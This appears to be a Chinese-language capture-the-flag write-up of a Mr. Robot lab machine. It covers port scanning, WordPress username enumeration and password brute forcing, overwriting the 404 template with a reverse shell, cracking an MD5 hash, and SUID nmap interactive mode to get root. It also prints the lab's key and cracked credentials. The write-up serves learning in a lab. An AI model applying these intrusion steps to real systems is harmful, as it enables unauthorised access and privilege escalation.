靶场搭建
下载下来是OVA文件,虚拟机打开,开机前将网卡从桥接模式调整至NAT就可以了
IP地址:192.168.74.141
渗透过程
初期信息收集
┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 04:28 EDT
Nmap scan report for bogon (192.168.74.141)
Host is up (0.00035s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:EA:7D:06 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.25 seconds
80,443端口,又是web层面的攻击,麻木了
打开浏览器看了一眼,woc这个真的牛逼,看上去真的很好玩
dirsearch扫了一下发现有一个robots.txt
进去看了一下有一些提示
User-agent: *
fsocity.dic
key-1-of-3.txt
key-1-of-3:073403c8a58a1f80d943455fb30724b9
fsocity.dic
是一个字典
对获取的信息感到困惑,思路卡住了
也许是密码吧,那账号是什么?也包含在里面了?wpscan进行用户名枚举了,没有发现账号啊?
尝试使用wpscan进行列表账号枚举,但是好像没有这个功能==、抓包尝试,发现后台登录的时候如果账号不存在则会提示不存在,那就有枚举的空间了
直接导入这个字典进行爆破,拿到了账号elliot
那接下来就可以用wpscan爆破了,再使用这个字典进行爆破得到密码:ER28-0652
。
真是沙比啊,放到最后,跑了85万啊!
文件上传
后台插件文件上传点有问题,不能直接传php了需要传zip。还需要自己做一个包?拉倒吧!直接修改模板,把404.php覆盖成反弹shell。
监听后,随便访问一个页面触发404,直接拿到shell
提权
低权限,需要拿权限
查看一下唯一一个用户robot,里面有一个md5的密码:c3fcd3d76192e4007dfb496cca67e13b
通过somd5.com
查询到密码为:abcdefghijklmnopqrstuvwxyz
通过python获取一个交互式shell,然后su到robot账户上
robot没有sudo权限==、
那要么用内核提权漏洞,要么就找Setuid权限的文件尝试利用:find / -perm -4000 2>/dev/null
发现机器上有nmap,低版本的nmap具有交互模式,能够执行shell命令(2.02至5.21)。
那么我们运行这个nmap交互模式:nmap --interactive
拿到root的shell:!sh
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
小结
需要了解不同中间件历史版本,wordpress插件上传变成了zip。所以转而修改404页面进行反弹shell。
爆破真是苦力活,靶场带宽足够,要是实战爆破真的是下下策。
nmap低版本的交互功能可以执行shell命令
当用户没有sudo权限时,并且更好方法时,尝试找到suid文件,进行利用。